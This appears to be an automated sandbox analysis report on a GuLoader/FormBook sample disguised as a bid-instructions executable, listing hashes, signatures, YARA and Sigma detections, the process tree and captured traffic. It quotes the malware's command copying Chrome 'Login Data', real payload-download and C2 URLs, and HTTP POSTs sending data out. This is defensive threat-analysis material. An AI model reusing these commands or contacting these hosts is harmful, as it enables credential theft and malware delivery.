Analysis Report 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe

Overview

General Information

Sample Name: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe
Analysis ID: 298143
MD5: 684b708590201203f895da1cfeb98b4c
SHA1: 7560967bc2919ead795d0189f64732fa5dbf242b
SHA256: fa98edefab6320f64d946ad9b4e634327c2aeb4266b2cc7efb710b0ec31915ee
Tags: exe, GuLoader

Detection

Threat names: FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Creates an undocumented autostart registry key
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe (PID: 6192 cmdline: 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe' MD5: 684B708590201203F895DA1CFEB98B4C)
    • 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe (PID: 1516 cmdline: 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe' MD5: 684B708590201203F895DA1CFEB98B4C)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 4408 cmdline: /c del 'C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2784 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x18349:$sqlite3step: 68 34 1C 7B E1
  • 0x1845c:$sqlite3step: 68 34 1C 7B E1
  • 0x18378:$sqlite3text: 68 38 2A 90 C5
  • 0x1849d:$sqlite3text: 68 38 2A 90 C5
  • 0x1838b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184b3:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa55a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb253:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b267:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\wlanext.exe, ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 6416, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, ProcessId: 2784

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Avira: detected
Antivirus detection for URL or domain
Source: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin&&ze | Avira URL Cloud: Label: phishing
Source: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.binrt/x | Avira URL Cloud: Label: phishing
Source: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: zedonliuhbcgygycgge7w.webredirect.org | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Virustotal: Detection: 33%
Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | ReversingLabs: Detection: 51%
Yara detected FormBook
Source: Yara match | File source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: 1.0.1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe.400000.0.unpack | Avira: Label: TR/AD.VBCryptor.lfcay
Source: 3.0.1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe.400000.0.unpack | Avira: Label: TR/AD.VBCryptor.lfcay
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then cld | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 5x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 6x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 9x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 8x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then cld | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 5x nop then cld | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 8x nop then add dword ptr [esp], edi | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then add dword ptr [esp], edi | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 6x nop then sub dword ptr [esp], 000000ABh | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_00402D26
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_004030A2
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then cld | 1_2_004030A2
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 6x nop then clc | 1_2_004030A2
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_004030A2
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 6x nop then cld | 1_2_004031DD
Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | Code function: 4x nop then clc | 1_2_004031F1
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop ebx | 16_2_006D7AFB
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 16_2_006DE391
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 16_2_006E7C62
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 16_2_006E6C52
Source: global traffic | HTTP traffic detected:
  GET /d76/?6l=EjUtg4s0Fhc8&HviHtn=moat6Vw28I6KWqn8yfv2WMw3ehpCDpQK+W5TFWHrPWRufdzgyKom2NQtE/4Tq4a4+jIMiqUqUw== HTTP/1.1
  Host: www.wilsonelectrician.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /d76/?HviHtn=WS9a0FRIeWdmFZf0w97w6NM5TDI0sryFROAw9yxh3cDs6lZJNP+BAeP95UcGIVPLQGZf+c/Whw==&6l=EjUtg4s0Fhc8 HTTP/1.1
  Host: www.casacampoplayaperu.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View | ASN Name: PLUSNETUKInternetServiceProviderGB
Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: global traffic | HTTP traffic detected:
  GET /uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: zedonliuhbcgygycgge7w.webredirect.org
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /d76/ HTTP/1.1
  Host: www.casacampoplayaperu.com
  Connection: close
  Content-Length: 416
  Cache-Control: no-cache
  Origin: http://www.casacampoplayaperu.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.casacampoplayaperu.com/d76/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  POST /d76/ HTTP/1.1
  Host: www.casacampoplayaperu.com
  Connection: close
  Content-Length: 172056
  Cache-Control: no-cache
  Origin: http://www.casacampoplayaperu.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.casacampoplayaperu.com/d76/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  GET /uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: zedonliuhbcgygycgge7w.webredirect.org
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /d76/?6l=EjUtg4s0Fhc8&HviHtn=moat6Vw28I6KWqn8yfv2WMw3ehpCDpQK+W5TFWHrPWRufdzgyKom2NQtE/4Tq4a4+jIMiqUqUw== HTTP/1.1
  Host: www.wilsonelectrician.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /d76/?HviHtn=WS9a0FRIeWdmFZf0w97w6NM5TDI0sryFROAw9yxh3cDs6lZJNP+BAeP95UcGIVPLQGZf+c/Whw==&6l=EjUtg4s0Fhc8 HTTP/1.1
  Host: www.casacampoplayaperu.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: unknown | DNS traffic detected: queries for: zedonliuhbcgygycgge7w.webredirect.org
Source: unknown | HTTP traffic detected:
  POST /d76/ HTTP/1.1
  Host: www.casacampoplayaperu.com
  Connection: close
  Content-Length: 416
  Cache-Control: no-cache
  Origin: http://www.casacampoplayaperu.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.casacampoplayaperu.com/d76/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Server: Microsoft-IIS/8.5
  Date: Wed, 14 Oct 2020 17:36:35 GMT
  Connection: close
  Content-Length: 1163
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.322725214.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: wlanext.exe, 00000010.00000002.520805542.00000000034E9000.00000004.00000001.sdmp | String found in binary or memory: http://www.casacampoplayaperu.com
Source: wlanext.exe, 00000010.00000002.520805542.00000000034E9000.00000004.00000001.sdmp | String found in binary or memory: http://www.casacampoplayaperu.com/d76/
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpLMEMhh
Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehpW
Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpCLMEMp
Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/ocid=iehp11/
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.334784429.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe | String found in binary or memory: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin
Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363329409.00000000009A8000.00000004.00000001.sdmp | String found in binary or memory: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.bin&&ze
Source: 1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe, 00000003.00000003.363329409.00000000009A8000.00000004.00000001.sdmp | String found in binary or memory: http://zedonliuhbcgygycgge7w.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_LdMBXQ110.binrt/x
Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp | String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp | String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmp | String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmp, wlanext.exe, 00000010.00000003.472163433.00000000009E7000.00000004.00000001.sdmp, wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1r
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wrep
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
      Source: wlanext.exe, 00000010.00000003.467990604.00000000009E7000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
      Source: wlanext.exe, 00000010.00000002.514448929.00000000009D0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
      Source: wlanext.exe, 00000010.00000003.467846011.00000000009CD000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/E

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match | File source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
